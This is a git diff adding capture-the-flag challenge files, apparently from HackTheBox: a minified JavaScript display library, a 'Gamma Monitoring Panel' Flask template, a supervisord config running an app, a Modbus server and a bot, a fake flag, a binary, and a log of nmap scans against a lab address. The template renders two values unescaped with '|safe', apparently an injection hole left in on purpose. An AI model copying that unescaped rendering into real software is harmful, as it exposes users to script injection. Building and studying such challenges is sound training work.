or(t,Ti(n,3),Ze)},pe.findLast=qo,pe.findLastIndex=go,pe.findLastKey=function(t,n){return or(t,Ti(n,3),Ke)},pe.floor=Zc,pe.forEach=Go,pe.forEachRight=Vo,pe.forIn=function(t,n){return null==t?t:Ge(t,Ti(n,3),ic)},pe.forInRight=function(t,n){return null==t?t:Ve(t,Ti(n,3),ic)},pe.forOwn=function(t,n){return t&&Ze(t,Ti(n,3))},pe.forOwnRight=function(t,n){return t&&Ke(t,Ti(n,3))},pe.get=Xa,pe.gt=va,pe.gte=_a,pe.has=function(t,n){return null!=t&&$i(t,n,tu)},pe.hasIn=tc,pe.head=wo,pe.identity=Oc,pe.includes=function(t,n,r,e){t=wa(t)?t:pc(t),r=r&&!e?Na(r):0;var u=t.length;return r<0&&(r=Gr(u+r,0)),Ba(t)?r<=u&&t.indexOf(n,r)>-1:!!u&&cr(t,n,r)>-1},pe.indexOf=function(t,n,r){var e=null==t?0:t.length;if(!e)return-1;var u=null==r?0:Na(r);return u<0&&(u=Gr(e+u,0)),cr(t,n,u)},pe.inRange=function(t,n,r){return n=Da(n),r===i?(r=n,n=0):r=Da(r),function(t,n,r){return t>=Vr(n,r)&&t=-B&&t<=B},pe.isSet=La,pe.isString=Ba,pe.isSymbol=Ta,pe.isTypedArray=Wa,pe.isUndefined=function(t){return t===i},pe.isWeakMap=function(t){return Ca(t)&&Ni(t)==ot},pe.isWeakSet=function(t){return Ca(t)&&Qe(t)==at},pe.join=function(t,n){return null==t?"":Fr.call(t,n)},pe.kebabCase=dc,pe.last=jo,pe.lastIndexOf=function(t,n,r){var e=null==t?0:t.length;if(!e)return-1;var u=e;return r!==i&&(u=(u=Na(r))<0?Gr(e+u,0):Vr(u,e-1)),n==n?function(t,n,r){for(var e=r+1;e--;)if(t[e]===n)return e;return e}(t,n,u):ar(t,sr,u,!0)},pe.lowerCase=yc,pe.lowerFirst=wc,pe.lt=Ma,pe.lte=Pa,pe.max=function(t){return t&&t.length?$e(t,Oc,Xe):i},pe.maxBy=function(t,n){return t&&t.length?$e(t,Ti(n,2),Xe):i},pe.mean=function(t){return lr(t,Oc)},pe.meanBy=function(t,n){return lr(t,Ti(n,2))},pe.min=function(t){return t&&t.length?$e(t,Oc,lu):i},pe.minBy=function(t,n){return t&&t.length?$e(t,Ti(n,2),lu):i},pe.stubArray=$c,pe.stubFalse=Fc,pe.stubObject=function(){return{}},pe.stubString=function(){return""},pe.stubTrue=function(){return!0},pe.multiply=Hc,pe.nth=function(t,n){return t&&t.length?gu(t,Na(n)):i},pe.noConflict=function(){return Bn._===this&&(Bn._=gn),this},pe.noop=Tc,pe.now=Xo,pe.pad=function(t,n,r){t=Ga(t);var e=(n=Na(n))?Er(t):0;if(!n||e>=n)return t;var u=(n-e)/2;return di(Ur(u),r)+t+di(Pr(u),r)},pe.padEnd=function(t,n,r){t=Ga(t);var e=(n=Na(n))?Er(t):0;return n&&en){var e=t;t=n,n=e}if(r||t%1||n%1){var u=Hr();return Vr(t+u*(n-t+On("1e-"+((u+"").length-1))),n)}return mu(t,n)},pe.reduce=function(t,n,r){var e=da(t)?rr:vr,u=arguments.length<3;return e(t,Ti(n,4),r,u,Ue)},pe.reduceRight=function(t,n,r){var e=da(t)?er:vr,u=arguments.length<3;return e(t,Ti(n,4),r,u,De)},pe.repeat=function(t,n,r){return n=(r?Vi(t,n,r):n===i)?1:Na(n),xu(Ga(t),n)},pe.replace=function(){var t=arguments,n=Ga(t[0]);return t.length<3?n:n.replace(t[1],t[2])},pe.result=function(t,n,r){var e=-1,u=(n=Vu(n,t)).length;for(u||(u=1,t=i);++eB)return[];var r=M,e=Vr(t,M);n=Ti(n),t-=M;for(var u=gr(e,n);++r=o)return t;var c=r-Er(e);if(c<1)return e;var f=a?Ku(a,0,c).join(""):t.slice(0,c);if(u===i)return f+e;if(a&&(c+=f.length-c),Ra(u)){if(t.slice(c).search(u)){var s,l=f;for(u.global||(u=rn(u.source,Ga(Ft.exec(u))+"g")),u.lastIndex=0;s=u.exec(l);)var h=s.index;f=f.slice(0,h===i?c:h)}}else if(t.indexOf(Wu(u),c)!=c){var p=f.lastIndexOf(u);p>-1&&(f=f.slice(0,p))}return f+e},pe.unescape=function(t){return(t=Ga(t))&&kt.test(t)?t.replace(xt,Lr):t},pe.uniqueId=function(t){var n=++hn;return Ga(t)+n},pe.upperCase=xc,pe.upperFirst=jc,pe.each=Go,pe.eachRight=Vo,pe.first=wo,Bc(pe,(Kc={},Ze(pe,(function(t,n){ln.call(pe.prototype,n)||(Kc[n]=t)})),Kc),{chain:!1}),pe.VERSION="4.17.15",Kn(["bind","bindKey","curry","curryRight","partial","partialRight"],(function(t){pe[t].placeholder=pe})),Kn(["drop","take"],(function(t,n){de.prototype[t]=function(r){r=r===i?1:Gr(Na(r),0);var e=this.__filtered__&&!n?new de(this):this.clone();return e.__filtered__?e.__takeCount__=Vr(r,e.__takeCount__):e.__views__.push({size:Vr(r,M),type:t+(e.__dir__<0?"Right":"")}),e},de.prototype[t+"Right"]=function(n){return this.reverse()[t](n).reverse()}})),Kn(["filter","map","takeWhile"],(function(t,n){var r=n+1,e=r==E||3==r;de.prototype[t]=function(t){var n=this.clone();return n.__iteratees__.push({iteratee:Ti(t,3),type:r}),n.__filtered__=n.__filtered__||e,n}})),Kn(["head","last"],(function(t,n){var r="take"+(n?"Right":"");de.prototype[t]=function(){return this[r](1).value()[0]}})),Kn(["initial","tail"],(function(t,n){var r="drop"+(n?"":"Right");de.prototype[t]=function(){return this.__filtered__?new de(this):this[r](1)}})),de.prototype.compact=function(){return this.filter(Oc)},de.prototype.find=function(t){return this.filter(t).head()},de.prototype.findLast=function(t){return this.reverse().find(t)},de.prototype.invokeMap=ju((function(t,n){return"function"==typeof t?new de(this):this.map((function(r){return eu(r,t,n)}))})),de.prototype.reject=function(t){return this.filter(ca(Ti(t)))},de.prototype.slice=function(t,n){t=Na(t);var r=this;return r.__filtered__&&(t>0||n<0)?new de(r):(t<0?r=r.takeRight(-t):t&&(r=r.drop(t)),n!==i&&(r=(n=Na(n))<0?r.dropRight(-n):r.take(n-t)),r)},de.prototype.takeRightWhile=function(t){return this.reverse().takeWhile(t).reverse()},de.prototype.toArray=function(){return this.take(M)},Ze(de.prototype,(function(t,n){var r=/^(?:filter|find|map|reject)|While$/.test(n),e=/^(?:head|last)$/.test(n),u=pe[e?"take"+("last"==n?"Right":""):n],o=e||/^find/.test(n);u&&(pe.prototype[n]=function(){var n=this.__wrapped__,a=e?[1]:arguments,c=n instanceof de,f=a[0],s=c||da(n),l=function(t){var n=u.apply(pe,nr([t],a));return e&&h?n[0]:n};s&&r&&"function"==typeof f&&1!=f.length&&(c=s=!1);var h=this.__chain__,p=!!this.__actions__.length,v=o&&!h,_=c&&!p;if(!o&&s){n=_?n:new de(this);var g=t.apply(n,a);return g.__actions__.push({func:Do,args:[l],thisArg:i}),new ge(g,h)}return v&&_?t.apply(this,a):(g=this.thru(l),v?e?g.value()[0]:g.value():g)})})),Kn(["pop","push","shift","sort","splice","unshift"],(function(t){var n=on[t],r=/^(?:push|sort|unshift)$/.test(t)?"tap":"thru",e=/^(?:pop|shift)$/.test(t);pe.prototype[t]=function(){var t=arguments;if(e&&!this.__chain__){var u=this.value();return n.apply(da(u)?u:[],t)}return this[r]((function(r){return n.apply(da(r)?r:[],t)}))}})),Ze(de.prototype,(function(t,n){var r=pe[n];if(r){var e=r.name+"";ln.call(ue,e)||(ue[e]=[]),ue[e].push({name:n,func:r})}})),ue[pi(i,y).name]=[{name:"wrapper",func:i}],de.prototype.clone=function(){var t=new de(this.__wrapped__);return t.__actions__=ri(this.__actions__),t.__dir__=this.__dir__,t.__filtered__=this.__filtered__,t.__iteratees__=ri(this.__iteratees__),t.__takeCount__=this.__takeCount__,t.__views__=ri(this.__views__),t},de.prototype.reverse=function(){if(this.__filtered__){var t=new de(this);t.__dir__=-1,t.__filtered__=!0}else(t=this.clone()).__dir__*=-1;return t},de.prototype.value=function(){var t=this.__wrapped__.value(),n=this.__dir__,r=da(t),e=n<0,u=r?t.length:0,i=function(t,n,r){var e=-1,u=r.length;for(;++e=this.__values__.length;return{done:t,value:t?i:this.__values__[this.__index__++]}},pe.prototype.plant=function(t){for(var n,r=this;r instanceof _e;){var e=lo(r);e.__index__=0,e.__values__=i,n?u.__wrapped__=e:n=e;var u=e;r=r.__wrapped__}return u.__wrapped__=t,n},pe.prototype.reverse=function(){var t=this.__wrapped__;if(t instanceof de){var n=t;return this.__actions__.length&&(n=new de(this)),(n=n.reverse()).__actions__.push({func:Do,args:[zo],thisArg:i}),new ge(n,this.__chain__)}return this.thru(zo)},pe.prototype.toJSON=pe.prototype.valueOf=pe.prototype.value=function(){return Nu(this.__wrapped__,this.__actions__)},pe.prototype.first=pe.prototype.head,Un&&(pe.prototype[Un]=function(){return this}),pe}();Bn._=Br,(u=function(){return Br}.call(n,r,n,e))===i||(e.exports=u)}).call(this)}).call(this,r(5),r(6)(t))},function(t,n,r){var e=r(2);"string"==typeof e&&(e=[[t.i,e,""]]);var u={insert:"head",singleton:!1};r(4)(e,u);e.locals&&(t.exports=e.locals)},function(t,n,r){(t.exports=r(3)(!1)).push([t.i,".lcd-container{padding:20px 30px;background-color:#c7e736;color:red;display:inline-block;font-size:0;border-color:#000;border-style:solid;border-width:10px 14px;box-shadow:inset 0 0 30px rgba(0,0,0,.3),0 10px 15px -5px rgba(0,0,0,.5);border-radius:3px;overflow:hidden}",""])},function(t,n,r){"use strict";t.exports=function(t){var n=[];return n.toString=function(){return this.map((function(n){var r=function(t,n){var r=t[1]||"",e=t[3];if(!e)return r;if(n&&"function"==typeof btoa){var u=(o=e,a=btoa(unescape(encodeURIComponent(JSON.stringify(o)))),c="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(a),"/*# ".concat(c," */")),i=e.sources.map((function(t){return"/*# sourceURL=".concat(e.sourceRoot).concat(t," */")}));return[r].concat(i).concat([u]).join("\n")}var o,a,c;return[r].join("\n")}(n,t);return n[2]?"@media ".concat(n[2],"{").concat(r,"}"):r})).join("")},n.i=function(t,r){"string"==typeof t&&(t=[[null,t,""]]);for(var e={},u=0;u{this.isVisible?this.render(!1):this.render(!0)},300))}}const i={20:{character:"Space",rows:[0,0,0,0,0,0,0]},21:{character:"!",rows:[4,4,4,4,4,0,4]},22:{character:'"',rows:[9,9,18,0,0,0,0]},23:{character:"#",rows:[10,10,31,10,31,10,10]},24:{character:"$",rows:[4,15,20,14,5,30,4]},25:{character:"%",rows:[25,25,2,4,8,19,19]},26:{character:"&",rows:[4,10,10,10,21,18,13]},27:{character:"'",rows:[4,4,8,0,0,0,0]},28:{character:"(",rows:[2,4,8,8,8,4,2]},29:{character:")",rows:[8,4,2,2,2,4,8]},"2a":{character:"*",rows:[4,21,14,31,14,21,4]},"2b":{character:"+",rows:[0,4,4,31,4,4,0]},"2c":{character:",",rows:[0,0,0,0,4,4,8]},"2d":{character:"-",rows:[0,0,0,31,0,0,0]},"2e":{character:".",rows:[0,0,0,0,0,12,12]},"2f":{character:"/",rows:[1,1,2,4,8,16,16]},30:{character:"0",rows:[14,17,19,21,25,17,14]},31:{character:"1",rows:[4,12,4,4,4,4,14]},32:{character:"2",rows:[14,17,1,2,4,8,31]},33:{character:"3",rows:[14,17,1,6,1,17,14]},34:{character:"4",rows:[2,6,10,18,31,2,2]},35:{character:"5",rows:[31,16,30,1,1,17,14]},36:{character:"6",rows:[6,8,16,30,17,17,14]},37:{character:"7",rows:[31,1,2,4,8,8,8]},38:{character:"8",rows:[14,17,17,14,17,17,14]},39:{character:"9",rows:[14,17,17,15,1,2,12]},"3a":{character:":",rows:[0,12,12,0,12,12,0]},"3b":{character:";",rows:[0,12,12,0,12,4,8]},"3c":{character:"<",rows:[2,4,8,16,8,4,2]},"3d":{character:"=",rows:[0,0,31,0,31,0,0]},"3e":{character:">",rows:[8,4,2,1,2,4,8]},"3f":{character:"?",rows:[14,17,1,2,4,0,4]},40:{character:"@",rows:[14,17,23,21,23,16,15]},41:{character:"A",rows:[4,10,17,17,31,17,17]},42:{character:"B",rows:[30,17,17,30,17,17,30]},43:{character:"C",rows:[14,17,16,16,16,17,14]},44:{character:"D",rows:[30,9,9,9,9,9,30]},45:{character:"E",rows:[31,16,16,28,16,16,31]},46:{character:"F",rows:[31,16,16,31,16,16,16]},47:{character:"G",rows:[14,17,16,16,19,17,15]},48:{character:"H",rows:[17,17,17,31,17,17,17]},49:{character:"I",rows:[14,4,4,4,4,4,14]},"4a":{character:"J",rows:[31,2,2,2,2,18,12]},"4b":{character:"K",rows:[17,18,20,24,20,18,17]},"4c":{character:"L",rows:[16,16,16,16,16,16,31]},"4d":{character:"M",rows:[17,27,21,17,17,17,17]},"4e":{character:"N",rows:[17,17,25,21,19,17,17]},"4f":{character:"O",rows:[14,17,17,17,17,17,14]},50:{character:"P",rows:[30,17,17,30,16,16,16]},51:{character:"Q",rows:[14,17,17,17,21,18,13]},52:{character:"R",rows:[30,17,17,30,20,18,17]},53:{character:"S",rows:[14,17,16,14,1,17,14]},54:{character:"T",rows:[31,4,4,4,4,4,4]},55:{character:"U",rows:[17,17,17,17,17,17,14]},56:{character:"V",rows:[17,17,17,17,17,10,4]},57:{character:"W",rows:[17,17,17,21,21,27,17]},58:{character:"X",rows:[17,17,10,4,10,17,17]},59:{character:"Y",rows:[17,17,10,4,4,4,4]},"5a":{character:"Z",rows:[31,1,2,4,8,16,31]},"5b":{character:"[",rows:[14,8,8,8,8,8,14]},"5c":{character:"\\",rows:[16,16,8,4,2,1,1]},"5d":{character:"]",rows:[14,2,2,2,2,2,14]},"5e":{character:"^",rows:[4,10,17,0,0,0,0]},"5f":{character:"_",rows:[0,0,0,0,0,0,31]},60:{character:"`",rows:[4,4,2,0,0,0,0]},61:{character:"a",rows:[0,14,1,13,19,19,13]},62:{character:"b",rows:[16,16,16,28,18,18,28]},63:{character:"c",rows:[0,0,0,14,16,16,14]},64:{character:"d",rows:[1,1,1,7,9,9,7]},65:{character:"e",rows:[0,0,14,17,31,16,15]},66:{character:"f",rows:[6,9,8,28,8,8,8]},67:{character:"g",rows:[14,17,19,13,1,1,14]},68:{character:"h",rows:[16,16,16,22,25,17,17]},69:{character:"i",rows:[0,4,0,12,4,4,14]},"6a":{character:"j",rows:[2,0,6,2,2,18,12]},"6b":{character:"k",rows:[16,16,18,20,24,20,18]},"6c":{character:"l",rows:[12,4,4,4,4,4,4]},"6d":{character:"m",rows:[0,0,10,21,21,17,17]},"6e":{character:"n",rows:[0,0,22,25,17,17,17]},"6f":{character:"o",rows:[0,0,14,17,17,17,14]},70:{character:"p",rows:[0,28,18,18,28,16,16]},71:{character:"q",rows:[0,7,9,9,7,1,1]},72:{character:"r",rows:[0,0,22,25,16,16,16]},73:{character:"s",rows:[0,0,15,16,14,1,30]},74:{character:"t",rows:[8,8,28,8,8,9,6]},75:{character:"u",rows:[0,0,17,17,17,19,13]},76:{character:"v",rows:[0,0,17,17,17,10,4]},77:{character:"w",rows:[0,0,17,17,21,21,10]},78:{character:"x",rows:[0,0,17,10,4,10,17]},79:{character:"y",rows:[0,17,17,15,1,17,14]},"7a":{character:"z",rows:[0,0,31,2,4,8,31]},"7b":{character:"{",rows:[6,8,8,16,8,8,6]},"7c":{character:"|",rows:[4,4,4,0,4,4,4]},"7d":{character:"}",rows:[12,2,2,1,2,2,12]},"7e":{character:"~",rows:[8,21,2,0,0,0,0]},"7f":{character:"DEL",rows:[31,31,31,31,31,31,31]}},o=(t,n)=>{return(Array(n).fill("0").join(0)+t).slice(-n)};class a{constructor({canvas:t,index:n,rows:r,columns:e,pixelSize:i,pixelColor:o}={}){this.canvas=t,this.index=n,this.rows=r,this.columns=e,this.pixelSize=i,this.pixelColor=o,this.setPosition(),this.pixels=[...Array(a.getPixelCount())].map((t,n)=>new u({canvas:this.canvas,index:n,size:this.pixelSize,color:this.pixelColor,offset:{x:this.x,y:this.y}})),this.render()}static getPixels(){return{row:5,column:8}}static getPixelCount(){const{row:t,column:n}=a.getPixels();return t*n}static getGutterSize(t){return t}static getSize(t){const{row:n,column:r}=a.getPixels(),e=u.getGutterSize(t);return{width:t*n+e*(n-1),height:t*r+e*(r-1)}}setPosition(){this.gutter=a.getGutterSize(this.pixelSize);const{width:t,height:n}=a.getSize(this.pixelSize),r=this.index%this.columns,e=Math.floor(this.index/this.columns);this.x=r*t+r*this.gutter,this.y=e*n+e*this.gutter}render(){this.pixels.forEach(t=>{t.render(!1)})}writeCharacter({charCode:t}){this.clearCharacter();const n=Object(e.isNumber)(t)?Number(t).toString(16):t,{rows:r}=i[n],u=r.map(t=>{const n=Number(t).toString(2);return o(n,5)}).join("").split("");this.pixels.forEach(t=>{const n=u[t.index];t.render("1"===n)})}clearCharacter(){this.pixels.forEach(t=>{t.render(!1)})}toggleCursorBlink(t=!1){const{row:n}=a.getPixels();this.pixels.slice(-n).forEach(n=>{n.blink(t)})}}class c{constructor({elem:t,rows:n,columns:r,pixelSize:e,pixelColor:u}){this.rows=n,this.columns=r,this.pixelSize=e,this.pixelColor=u,this.elem=t,this.render(),this.blocks=[...Array(this.rows*this.columns)].map((t,n)=>new a({canvas:this.canvas,index:n,rows:this.rows,columns:this.columns,pixelSize:e,pixelColor:u})),this.activeBlockIndex=null}static getSize(t,n,r){const e=a.getSize(r),u=a.getGutterSize(r);return{width:e.width*n+u*(n-1),height:e.height*t+u*(t-1)}}render(){this.canvas=document.createElement("canvas");const{width:t,height:n}=c.getSize(this.rows,this.columns,this.pixelSize);this.canvas.setAttribute("width",t),this.canvas.setAttribute("height",n),this.elem.innerHTML="",this.elem.appendChild(this.canvas)}writeCharacter({charCode:t,blockIndex:n=0}={}){const r=Object(e.find)(this.blocks,{index:n});r&&r.writeCharacter({charCode:t})}writeString({string:t="",offset:n=0}={}){t.split("").forEach((t,r)=>{const e=t.charCodeAt(0);this.writeCharacter({charCode:e,blockIndex:r+n})})}clearCharacter({blockIndex:t=0}={}){const n=Object(e.find)(this.blocks,{index:t});n&&n.clearCharacter()}clearScreen(){this.blocks.forEach(t=>{this.clearCharacter({blockIndex:t.index})})}blinkCursor({blockIndex:t=0,stop:n=!1}={}){const r=Object(e.find)(this.blocks,{index:t});if(r){if(null!==this.activeBlockIndex){Object(e.find)(this.blocks,{index:this.activeBlockIndex}).toggleCursorBlink(!0)}this.activeBlockIndex=t,r.toggleCursorBlink(n)}}}n.default=c}]).default})); +//# sourceMappingURL=index.js.map diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/templates/index.html b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/templates/index.html new file mode 100644 index 00000000..30a50ab9 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/templates/index.html @@ -0,0 +1,139 @@ + + + + + + + + +Gamma Monitoring Panel + + + + + + + + + + + + + + +
+

Gamma Monitoring System


+
+
+
{{tmpl|safe}}
+ +
+
+ +
+ +

+ + + + +



{{fm|safe}} +
+
+ + + + + + + diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/config/supervisord.conf b/LaokoonHaxorcist/hw_invasion/hw_invasion/config/supervisord.conf new file mode 100644 index 00000000..d6b22863 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/config/supervisord.conf @@ -0,0 +1,27 @@ +[supervisord] +nodaemon=true +logfile=/dev/null +logfile_maxbytes=0 +pidfile=/run/supervisord.pid + +[program:flask] +command=python3 /app/app.py +stdout_logfile=/dev/stdout +stdout_logfile_maxbytes=0 +stderr_logfile=/dev/stderr +stderr_logfile_maxbytes=0 + +[program:modbus] +command=python3 /app/server.py +stdout_logfile=/dev/stdout +stdout_logfile_maxbytes=0 +stderr_logfile=/dev/stderr +stderr_logfile_maxbytes=0 + +[program:bot] +command=python3 /app/bot.py +stdout_logfile=/dev/stdout +stdout_logfile_maxbytes=0 +stderr_logfile=/dev/stderr +stderr_logfile_maxbytes=0 + diff --git a/LaokoonHaxorcist/pwn_formula/flag.txt b/LaokoonHaxorcist/pwn_formula/flag.txt new file mode 100644 index 00000000..8c8ec324 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/flag.txt @@ -0,0 +1 @@ +HTB{f4k3_fl4g_4_t35t1ng} diff --git a/LaokoonHaxorcist/pwn_formula/formula b/LaokoonHaxorcist/pwn_formula/formula new file mode 100755 index 0000000000000000000000000000000000000000..da28b7699c521ef1d5afb3dbe9c584affd4c3944 GIT binary patch literal 13376 zcmeHOZFE$}d7jlGz%ncX3rq|)7soh&twl0I2)hbeA&IM0*eV962_HAB-MiA3{ZM!B zVu|8Jt!&3zp;#yJNjRMLl%}aua{7aOmU4P*VN$T2{E*Yc$w{0R`y}bE9oK5@I0}tX zpLg!Ot9!3@>-L=f=nqERedm4Nk9qIR+_^Jzhfj6(bXEC$f|Fl-SP(Z+VixHPgjP&kss=Embz)rE8TQQ;v{mwUU)16LmJqR0vH1 zWJj?!+$vd6O=g&0QE>F`ZU{G3EQCd!uWg^6RA?kWpevx|Di< zZbc~{T_M?dG-1PnDck)X>?qFvX{uFSapB&s5#6*pi6%H8*WZMC%jrRBot# zsHM5Sxha@U2k(*hP5w!D_x<~2NmQ*|#S}9&6JaFpzH8+9kB`2(>zhN5Tz&0rD{E*Ndn@2~ zR=_(e;M9)g%Kcac{0kLus)%xadMe-(74V+`*Km2$dI078KT!c+RRO=T0{%L14VO1% z0hB9u82Ig8W$?=@=w~Y6ho#MGQLAal3Bk|rPUM%Pw`m?+px;NRn>Pz{C~k>tCY*|j zSbES*iNTze6;?cH3d6`+;m8pqGH}F*h2selMFzqdk+q_6C}!d*D<)$7CJeGxCIRD& z8IF=TowGzNl1OJw5l)0NNs-GYOmh$}BST>$7Egr}@nfdQn%2?2T#T$ENs>}rRBFaD zl3|pwyQjN-mvK+9sg%1XxJ?+{`}P=7Gh_D0vzD3Jw`W%(oig`@`w|p%e=?m?J`7v6 ztfKuSSK)cC!ZU1B{w10HH?w0rsWbt+6De<_>?J+?e z2dPDkzl`@Pe6gpUnE%l_P1@1e$m0(IR~)!{)k(dA0}n{V{+V{*H#zVb2fosQbAO_D z6^&z@xIYn2;}|Dh`B?zZUE4jc_uN>4a&)g)3j;lP)aw1qh7z|j#(>9hl1RzijN8wbvPh{R_dI6eEE&N*=B z_%Z3g)l@;6Jnz71?BX=#z;9*{R3H82VtuUouUBb8e{9mKnw`=|zrFaPnBDf;N=?je z_!)ket!qP$_yMvkUYSMO@MGesiHlQ`{~qzwHH(vyf01}<>f%|+KSw+@aq+a|&l68g zTbz*m*NCSkEsjY3E5uV%76&E&MdGOmi=UAEDdMT=ioKHmEb;UR6x$^Kr^Hhe78@l0 zC&W|J6*b8pBc7V9SS$Gq@${$^h2;N$cxt-h^fdq*`iQ3{D_)WO$BCz=Do#nB>|+z) zWomr0JO9#QJ^z|M`m^cYeLdsVS8?z9_|j2HTHi#?%&xo>Ht#H3*FlojZZP}x@#+w$ zzGFtu|J?cjn&xVq-84%N&0dKGm#uqL`ag7$T4j!h{S9O{zO72S*>nx|`h{zLJwL5q zDD2dIm-LseS*zjjf^xWo99Hr-()tqAL~e^d+WG~`?WcH_=wq#?z!jFFMhZH9E>)ia z@1t-=D6qFL!X@s9)DIP7(4ZW8S#MMyTd-jxRP=o3OyeX1rU_Qz>+j9ZBL7>|N8!sd zzik6>KpKhnp>APtP9J^boXFjd`>V61Ye3FXiG{Di>RIZDh3%v~w*Q5i;u}GXXOdW$nBuw|xnbA)4=i*yV*vC9!C z=7~ZY3KI~{MD?w99a`1W{)LMbYqz?a;?Co~$E&;S?DNQ;z!M5|3fb@2*&iWWZ!26u zcC(!=*d>1xkszQ?f)sv3`RDRe7iQL7DBR|IZuB+(Cb0TReXQdjW%d5+eS^2Y zIj-p`!1Ka?17Ioq`PJTf3Qh{2mkwK>L`;RxQR9xc{uAXtZRgif5BVcI-$(i}TYop< z5#aMm&HcBfj#d9)xhDRe>ij(1iDxKB4e|{69jpFwdFg3LpZye63(d&QE7RvJQ}gtZ z0u643X2e>cVMagKo5)$|R6K`9dh1f>uaoG@h4VD*>G?}`o4k6JDq{azB+>IPQ+(F| zJvNzJRCp3?^hR|dhz=t=t3I}eI?WRK;Gxsxp!fowRT27V=%McX4@3Jy7@Icy+fq67 z)DwL$lz*=~|8CDFdTJNz7vA$1e)t=d_}H74*7y@1FM9G-Hg${-eg${>|ixYF>)7uwu2jow_U1)AV6)eP>1C94>y(cMZ4%~G}+cyx; zYV^<2_Fw`yyxvB`M@-Ek5vHhGES*TCAJ&rQy)_~uf?HyVaDUJmvTRR{N$FLH4cPY2TKh6z}G

G1o}fv`nAODdQt3NB;Xf$v>fYiDL>Uje-v^ij}eJSy*iz5-f{m(of+aCd_~1=<7pAO?d3=nJ4HKwI&^ z{w?TtLB9+7J9u*I@MzS*2PNOJy}~zC>szyA(c%f;qFTafjeq*rv$J=Rf=cD}g}4K9 z(r-Y#4e&1lwOxVLA6a(e!;446&Rg!=y!DRT$pzVW;A(+i8f`eyoc|!MdvSkH6Br8A zK3=tJDNWQ!HiYZjknI3<%BakzaJ>o{4UHvP)iK`ZNB{fHuCM zJ+SdawH|1Ae4!p_8C|p|(3T0bgaQqrz{d7~20iGv2NugU-*NcS(4O{)M$WFM>ost_ z2Cmn@^%}Td1J`TddJX*ls{!7J=6z?H8d73Pb6iR-YIBtLHov4cGkMRK_qW&B>ZR`v zw|gK4t$GL0rK7~%|R)xv`Og~y96>d zsC`eKo1InmbxO{A#k?o_gaQ~psRH4+<%SMydC!>3zfJjLJxmAX{h>GsVQnvYxx)!v ztom6lEvFUVq{_pzSIYT5l>7fP!ry(p4rA)Zjw<@NqMujvX+^)K=p{v8R`eH&zN_d$ z)o`m6y;IR2 zpSbbG_71ueMBb0y%Kg|W@{1b5{oRe!EUg12BD_Cqt z#)lR9MinQON2v>!537A1mnDcF+BYNr{9a&u7#Uxg`aB7|T>O>p>xqVu{?<2|L=ch6=zyHuU?km&23vmN0P!Fe7Kjg=FmBRl{y$I!= z1bnQOxGco=(+FI1AvUuIIDL=j@2dR1Fj0_JreB4jU#5$Ttn!0>I_a4GJTCPEqD{TP z<-QCw#(>wtKbLDqBgAK=K67)F_O4cl`OoRo74*+nz+aYlK%7$j_GwkbKUdKIj|zA- z>WA88M%|a(GlH)r5}%8kbGKE%TPxtb74QgfsyFZRK3GBjQHck{u!>XeeIclE;2H<# zpnnE@dDYE=-&-s?LpVz2@o<3>oRj`pYmUAs@qlPh{Z{U2LHrN6=(JITrp+lM7gzdx zK92Vie+-=Tz5V1DO8+m_VS*FN+Zz&hxwaWhT*~#^n=0TNfKxqq%WVX%m2sb{;OBRN z-(E)l`!de?@3jwCh`(R@4~TkozjBWeev=i-6_JdUwQ{joFe2v8r5IMyz!{j7nZ>D; zXxivcr2E1NBWk5HStFbq5|MOrFkxC|G`PKaM@xAnIxG`6!kJ8X*ubuIW>~~B;iPFq zbIIf|OdOm6P0Oun@4O=_!|2)@+S6%t-rr&1RE%3SDvXYg-5=W1y~{0;2XO%5c$?9w zD-U|dUSaI+d7wSiV?5B+^?(r4oD}s z${x#dpAd6z&(g&qrsJ*-13im6nKa~si z<>EO18IOt}aRcG(fCxs1Q}Aa~)Topk#pkAYI^|*v$TDUkOa>}9n6N}pR$UO;V1F8{ zW#S8EkRD_xrDgvNngi<59f-mSbGE7d4BHl*M+xC%Jc5|0dk4`fB8c%Li7}zffcL+I zX#I{?FXn)D;`I(wUcW1`)a5+U58|RVGu!jJh^YpdGx7V3u|{N^_Pl;#dIu{i>b36x zj!#@^E}z#~OgAb!-e=(X61%-08JeQ7{iMn;rT0B0TAouqu|2Q<9|DF~L&=`kZA^LJ z0xB|*4`(_IhV}%wd|uy`s8Z(mS&!)v$Z3y(dERGW+Mw*c@heyyLx$>wtl!4>Bzm;L>f$DY^6Oufr)Z~s4|?797T-pKT8 zEKmh<++6-wJ@&lbW}09{MZM+Ie4Of^i{W)S(@9T<_m=+xY-y@R&k!YE$MJc7uRilk ze*hbr`m#N*Z(D99Z*%?4=H_^|e-#4idu-490sQ|Zrd9mhKiQ7^53Pquh3$FYpkWyS9@OY05IHsNyE0oyS@jSOL2KF_0THCsawo58Qw->-mC`3)rvJHz&y zJh-Y3X+t97x$T{*ZJN!ssetJ{Lu(C=pT|$?-yFMbVgHV7wCNvvgj_!BE=R_rB1OKt NZH;TJsHoTezW~d_-xL4< literal 0 HcmV?d00001 diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/local.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/local.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/proof.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/proof.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_commands.log b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_commands.log new file mode 100644 index 00000000..cc0779cd --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_commands.log @@ -0,0 +1,4 @@ +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN 